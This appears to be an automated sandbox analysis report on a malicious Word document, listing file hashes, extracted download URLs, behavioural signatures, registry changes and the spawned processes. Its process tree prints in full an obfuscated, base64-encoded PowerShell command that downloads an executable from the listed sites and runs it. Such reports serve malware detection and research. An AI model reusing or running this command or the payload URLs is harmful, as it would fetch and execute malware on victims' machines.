Analysis
-
max time kernel
101s -
max time network
22s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
28-09-2024 03:18
Behavioral task
behavioral1
Sample
fb6643cf59c6777d54f08ff9dd4f4f7c_JaffaCakes118.doc
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
fb6643cf59c6777d54f08ff9dd4f4f7c_JaffaCakes118.doc
Resource
win10v2004-20240802-en
General
-
Target
fb6643cf59c6777d54f08ff9dd4f4f7c_JaffaCakes118.doc
-
Size
252KB
-
MD5
fb6643cf59c6777d54f08ff9dd4f4f7c
-
SHA1
250f22eb7d61b97f0c912535ef84215a74fe5462
-
SHA256
4619c7c0dfd83d76ff1daf51de6f5e714cd8fa4f5298fb4cc4f113cb2045cc29
-
SHA512
9979a1d192aaf64f3c0f5bff90475001b5ce2945b68f1fce8011591b80e125835e8b8f928356534d10638f7778c47ba4ad61a29f2eaf49d4c7d37c32f4c346f5
-
SSDEEP
3072:6Yy0u8YGgjv+ZvchmkHcI/o1/Vb6///////////////////////////////////w:C0uXnWFchmmcI/o1/p2yORO
Malware Config
Extracted
http://hoagietesting10.com/wp-content/SJ/
http://iscamenabe.com/wp-content/1PR/
http://vietmade.org/wp-admin/8/
http://www.filamchimovies.com/wp-admin/8/
https://strattonmobile.com/wp-content/yl/
https://blog.qgdxzs.com/wp-admin/I/
http://vietsex.pro/wp-content/PX/
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2880 1844 powershell.exe 29 -
Blocklisted process makes network request 7 IoCs
flow pid Process 8 2880 powershell.exe 9 2880 powershell.exe 10 2880 powershell.exe 12 2880 powershell.exe 13 2880 powershell.exe 16 2880 powershell.exe 17 2880 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WINWORD.EXE -
Office loads VBA resources, possible macro or embedded object present
-
Modifies registry class 64 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLOption" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE4-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D63-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcToggleButton" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074}\ = "IReturnInteger" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02372-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{29B86A70-F52E-11CE-9BCE-00AA00608E01}\ = "IOptionFrame" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D23-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcList" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC3-866C-11CF-AB7C-00AA00C08FCF}\ = "IScrollbar" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{BEF6E003-A874-101A-8BBA-00AA00300CAB} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D43-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCheckBox" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE9-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents10" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{D21A74B3-E9C9-4032-B362-DA46968D99C2}\2.0 WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC9-866C-11CF-AB7C-00AA00C08FCF}\ = "IMultiPage" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{D21A74B3-E9C9-4032-B362-DA46968D99C2}\2.0\0\win32 WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D117-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLCheckbox" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{5512D11D-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLHidden" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{47FF8FE5-6198-11CF-8CE8-00AA006CB389} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{8BD21D42-EC42-11CE-9E0D-00AA006002F3}\ = "MdcCheckBoxEvents" WINWORD.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{D21A74B3-E9C9-4032-B362-DA46968D99C2}\2.0\FLAGS WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} WINWORD.EXE Key created \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776} WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{5512D113-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0}\ = "LabelControlEvents" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\TypeLib\{D21A74B3-E9C9-4032-B362-DA46968D99C2}\2.0\ = "Microsoft Forms 2.0 Object Library" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{04598FC2-866C-11CF-AB7C-00AA00C08FCF}\ = "ITabStrip" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" WINWORD.EXE Set value (str) \REGISTRY\USER\S-1-5-21-457978338-2990298471-2379561640-1000_CLASSES\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9}\ = "ImageEvents" WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 904 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2880 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2880 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 904 WINWORD.EXE 904 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 904 wrote to memory of 1920 904 WINWORD.EXE 33 PID 904 wrote to memory of 1920 904 WINWORD.EXE 33 PID 904 wrote to memory of 1920 904 WINWORD.EXE 33 PID 904 wrote to memory of 1920 904 WINWORD.EXE 33
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\fb6643cf59c6777d54f08ff9dd4f4f7c_JaffaCakes118.doc"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:904 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:1920
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -encod JABUADkAXwBvAGUAeQA2AD0AKAAoACcAQgAnACsAJwBsAGgAJwApACsAJwBnAHoAJwArACcANABvACcAKQA7AC4AKAAnAG4AZQB3AC0AaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgB2ADoAVQBzAEUAcgBQAFIATwBmAEkATABFAFwAcQA3AGMAVgBtAGcANQBcAGgAdgA3ADQAeAA2AEwAXAAgAC0AaQB0AGUAbQB0AHkAcABlACAARABJAFIAZQBDAFQAbwByAFkAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBDAFUAcgBgAEkAYABUAHkAUAByAE8AVABgAE8AQwBPAGwAIgAgAD0AIAAoACgAJwB0AGwAcwAxACcAKwAnADIALAAgAHQAbAAnACsAJwBzADEAJwArACcAMQAnACkAKwAnACwAJwArACcAIAB0ACcAKwAnAGwAJwArACcAcwAnACkAOwAkAEUAOAAyADgAbABlADAAIAA9ACAAKAAoACcARQAnACsAJwBoADUAdQAnACkAKwAnAHUAJwArACgAJwBpACcAKwAnAGoAagBrACcAKQApADsAJABMADEANAB5AGEAbAB3AD0AKAAnAEUAbwAnACsAJwBlAHUAJwArACgAJwBqAF8AJwArACcAYgAnACkAKQA7ACQATABkAGwAMQBrAHoAcQA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAoACgAKAAnADkATQAnACsAJwBIAFEANwBjAHYAbQBnACcAKwAnADUAJwApACsAJwA5ACcAKwAnAE0ASAAnACsAJwBIAHYAJwArACcANwAnACsAKAAnADQAeAA2AGwAJwArACcAOQBNAEgAJwApACkALQByAEUAUABMAEEAQwBFACAAIAAoACcAOQBNACcAKwAnAEgAJwApACwAWwBjAGgAQQByAF0AOQAyACkAKwAkAEUAOAAyADgAbABlADAAKwAoACcALgBlACcAKwAnAHgAZQAnACkAOwAkAE4AYgBfAHgAdAByAGgAPQAoACgAJwBRAHEAJwArACcAYgAnACkAKwAoACcAMwB5AHMAJwArACcAeQAnACkAKQA7ACQAVgB1AHQAcAByAHEAbgA9ACYAKAAnAG4AJwArACcAZQB3AC0AbwBiACcAKwAnAGoAZQBjAHQAJwApACAAbgBlAHQALgB3AEUAQgBDAGwAaQBFAE4AVAA7ACQATwBzADAAbgBjAHEAMQA9ACgAJwBoACcAKwAnAHQAdAAnACsAKAAnAHAAOgAnACsAJwAvACcAKQArACgAJwAvACcAKwAnAGgAbwAnACkAKwAnAGEAZwAnACsAKAAnAGkAZQAnACsAJwB0ACcAKwAnAGUAcwB0AGkAJwApACsAJwBuAGcAJwArACcAMQAnACsAKAAnADAALgBjAG8AbQAnACsAJwAvACcAKQArACgAJwB3AHAALQBjACcAKwAnAG8AbgB0AGUAJwArACcAbgB0AC8AUwBKACcAKwAnAC8AKgBoAHQAdABwADoALwAnACsAJwAvACcAKwAnAGkAJwArACcAcwBjAGEAJwArACcAbQBlACcAKwAnAG4AYQAnACkAKwAoACcAYgAnACsAJwBlAC4AJwArACcAYwBvAG0AJwArACcALwAnACsAJwB3AHAALQBjAG8AbgB0AGUAbgB0AC8AMQAnACsAJwBQACcAKwAnAFIALwAqACcAKQArACgAJwBoACcAKwAnAHQAdAAnACkAKwAnAHAAOgAnACsAKAAnAC8ALwAnACsAJwB2AGkAZQB0AG0AJwApACsAJwBhAGQAJwArACcAZQAuACcAKwAnAG8AJwArACcAcgAnACsAKAAnAGcAJwArACcALwB3ACcAKQArACcAcAAtACcAKwAoACcAYQBkAG0AaQAnACsAJwBuAC8AJwArACcAOAAnACkAKwAnAC8AJwArACcAKgAnACsAKAAnAGgAdAB0AHAAJwArACcAOgAvAC8AJwApACsAKAAnAHcAJwArACcAdwB3ACcAKQArACcALgAnACsAKAAnAGYAaQAnACsAJwBsAGEAJwArACcAbQBjACcAKQArACcAaAAnACsAKAAnAGkAbQAnACsAJwBvACcAKQArACgAJwB2AGkAZQBzACcAKwAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQBhACcAKwAnAGQAbQBpAG4AJwApACsAKAAnAC8AOAAnACsAJwAvACoAJwArACcAaAB0AHQAcABzADoAJwApACsAKAAnAC8ALwBzACcAKwAnAHQAJwApACsAKAAnAHIAYQAnACsAJwB0AHQAJwApACsAJwBvACcAKwAnAG4AbQAnACsAJwBvACcAKwAnAGIAJwArACcAaQBsACcAKwAoACcAZQAuACcAKwAnAGMAbwAnACkAKwAoACcAbQAvACcAKwAnAHcAcAAtACcAKQArACgAJwBjACcAKwAnAG8AbgAnACkAKwAoACcAdAAnACsAJwBlAG4AJwApACsAJwB0ACcAKwAnAC8AeQAnACsAKAAnAGwAJwArACcALwAqACcAKwAnAGgAdAB0AHAAcwAnACkAKwAoACcAOgAvAC8AYgAnACsAJwBsACcAKQArACcAbwBnACcAKwAnAC4AcQAnACsAKAAnAGcAZAB4AHoAJwArACcAcwAnACsAJwAuAGMAbwAnACsAJwBtAC8AJwApACsAKAAnAHcAcAAnACsAJwAtAGEAJwApACsAKAAnAGQAbQBpAG4ALwBJACcAKwAnAC8AKgBoACcAKwAnAHQAJwApACsAKAAnAHQAcAA6ACcAKwAnAC8ALwB2AGkAJwArACcAZQB0AHMAJwApACsAKAAnAGUAeAAnACsAJwAuACcAKQArACcAcAAnACsAJwByACcAKwAoACcAbwAnACsAJwAvAHcAJwApACsAKAAnAHAAJwArACcALQBjAG8AbgAnACkAKwAnAHQAJwArACgAJwBlAG4AdAAvACcAKwAnAFAAWAAnACsAJwAvACcAKQApAC4AIgBzAHAAYABsAGkAdAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAEMAYgBpAGYAYwBvAGsAPQAoACcATwBnACcAKwAoACcAeABhACcAKwAnADUAdwAnACkAKwAnADkAJwApADsAZgBvAHIAZQBhAGMAaAAoACQAQgBlAHYAcQBxAHcANQAgAGkAbgAgACQATwBzADAAbgBjAHEAMQApAHsAdAByAHkAewAkAFYAdQB0AHAAcgBxAG4ALgAiAGQATwBgAHcAYABOAGwATwBBAGQARgBpAEwARQAiACgAJABCAGUAdgBxAHEAdwA1ACwAIAAkAEwAZABsADEAawB6AHEAKQA7ACQATgBuADEAaQBrAHgAdgA9ACgAJwBOACcAKwAoACcANgAnACsAJwBhAHYAawAnACsAJwA1ADYAJwApACkAOwBJAGYAIAAoACgALgAoACcARwBlAHQAJwArACcALQAnACsAJwBJAHQAZQBtACcAKQAgACQATABkAGwAMQBrAHoAcQApAC4AIgBMAGUATgBnAGAAVABoACIAIAAtAGcAZQAgADMAMwAyADAAOAApACAAewAmACgAJwBJAG4AdgAnACsAJwBvAGsAZQAtACcAKwAnAEkAdAAnACsAJwBlAG0AJwApACgAJABMAGQAbAAxAGsAegBxACkAOwAkAEsAcgBpADMANwBlAGUAPQAoACcAQwAnACsAKAAnAGMAJwArACcAbQA1AGgAZQAnACsAJwBiACcAKQApADsAYgByAGUAYQBrADsAJABGAGoAbAAzAHEAcQByAD0AKAAoACcASAB4ACcAKwAnAGgAbgAnACkAKwAnADEAJwArACcAdgAyACcAKQB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWgBrAHEAZQAxAGMAeAA9ACgAKAAnAFAAcgAnACsAJwBmAHUAagBlACcAKQArACcAbAAnACkA1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2880
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
19KB
MD510a383ed7bb4010f01cde65cff6a269a
SHA13e404cb97d14c4fffbe18833cd27552d5a19e6d1
SHA2567f9ff81b3c5097944fd257766c92cc461e5030ad2ec66b63518e3408b5dd5805
SHA512f30b1d107220928014eb5b0d54804817b222514c61028f14714b23ee7e155542cbff33e51811a4609ffea816c81293b50dcfe96add2cc5c690fb93bfe11efc2d